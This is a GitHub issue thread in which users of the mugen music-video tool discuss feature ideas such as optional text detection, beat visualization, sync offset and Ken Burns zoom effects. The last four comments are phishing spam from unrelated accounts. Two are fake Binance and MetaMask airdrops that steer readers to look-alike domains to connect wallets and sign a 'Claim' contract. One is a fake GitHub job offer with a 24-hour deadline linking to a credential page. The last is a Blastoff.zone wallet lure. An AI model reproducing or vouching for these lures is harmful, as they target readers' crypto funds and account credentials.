### ISSUE TITLE
Feature suggestions

### ISSUE THREAD

**Issue by sethcohn** [scherroman/mugen#5]
Playing with this... and having fun imagining uses for it.

Some suggestions:

- Make Text detection optional
- Add some visual beat option, or maybe a beat visualization layer?
- allow for slight offset for beat/video sync (so that you can adjust to correct for visual/auditory lag) (ie appear to change just on the beat)
- allow setting specific videos to only certain time windows (so you could ensure Video X is only at end, or Video Y won't be used after halfway point, etc...)

**Comment by scherroman** [comment]
Hey thanks for trying this out, these are some great ideas!

I'm in the process of rewriting mugen from the ground up for an initial release, and I'm definitely including things like: 

- high level of control over which filters to use, including **optional text detection**

- **keeping the original audio instead of mixing in a song**

- custom cut locations (locations where a change between clips should occur). 

**visual beat option/visualization layer**: Do you mean adding visual effects to some beats, instead of always cutting? Like the pulses in [this amv](https://www.youtube.com/watch?v=8elOFNmJys4&feature=youtu.be&t=50s) after the 50 sec mark? There they do visual pulses on bass and cuts on snare. Though later on, they start cutting to the melody more often, and use pulses for most of the beats.

**slight offset for beat/video sync**: This would surely be useful. I'm curious what kind of sync/lag issues you've seen? Do the cuts between clips sometimes appear to be slightly off-beat? Are there some songs where the beat detection is completely off?

**ken burns (zoom and pan)**: I've noticed many amv creators do use slow-zoom and pan effects, especially on clips without much motion. I didn't realize thats called the **[ken burns](https://www.youtube.com/watch?v=1t16je0AOXU)** effect! Ideally, if there were an option to add a mix of ken burns effects to the clips, we'd only want to add them to clips which don't already have zooms or pans (i.e. we'd want a method to detect if a clip  a zoom or pan).

I've added some of your other ideas to my notes. **"stay nearby"** is an interesting one. Some of them i've definitely been thinking about, like control over **chronology** and **time windows**.

**Comment by sethcohn** [comment]
> visual beat option/visualization layer
Yes, that's one way to do it (pulsing)... and I've seen that used to good effect.
Another is something like this: https://www.youtube.com/watch?v=6ksA1BaOpOU (adding the audio in a visual way...)

I was actually thinking of yet a 3rd way, which is to _show_ the beats on a moving timeline.  Sorta of like guitar hero or karaok-ish.  I recently found perl code to do this: https://github.com/jd284/mkbeat
(Turning your beat analysis into this text format would be perfect, that's a really flexible format, and hand editable...)   If I do a sample video, I'll let you know.
This is a flexible idea: Here's how someone does it with a video editor: https://www.youtube.com/watch?v=c6FOuC0g7_w

> slight offset
I haven't played a lot (yet), but I think I noticed places where it felt like it wasn't 'quite right', and unsure why... being able to go into the json, it's certainly possible to manually fix this, but it might be nice to have a command line option to tweak widely. (like "hmm, if I cut .005 earlier, it feels better")

> ken burns
True, a method to detect might be good, but applying it to a moving clip wouldn't hurt it, it would only change the speed/direction of the movement.  Make it something you can turn off or adjust in json per clip, so if you watch your video and notice a clip that doesn't need, or needs tweaking to focus it differently, etc.  I am pretty sure there is an basic algorithm to figure out the focal point of at least a still image, to direct zoom/pan movement toward it. Example I found quickly: https://github.com/jonom/jquery-focuspoint

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @TUGOhost, @amany9000, @pistomat, @KunPengRen, @0x0h, @Buooy, @nattatorn-dev

**Comment by jayceediaz2214** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @ratio91, @loophe, @silmacmal, @jack-goodson, @danBamikiya, @dalinxz, @billykwok

**Comment by Yucao-cy** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kangchihlun, @MarkKobs, @ysnbogt, @sangxiaolong, @0xbuidlman, @mateuspinto, @tkmct, @chs2019, @imollov, @tequreq, @violetstair, @yajin, @nasjp, @zhaoyang110157, @aphexyuri, @zigagrcar, @wiasliaw, @ayush-3516, @gaslimitreached, @iower

**Comment by maulanaayub** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
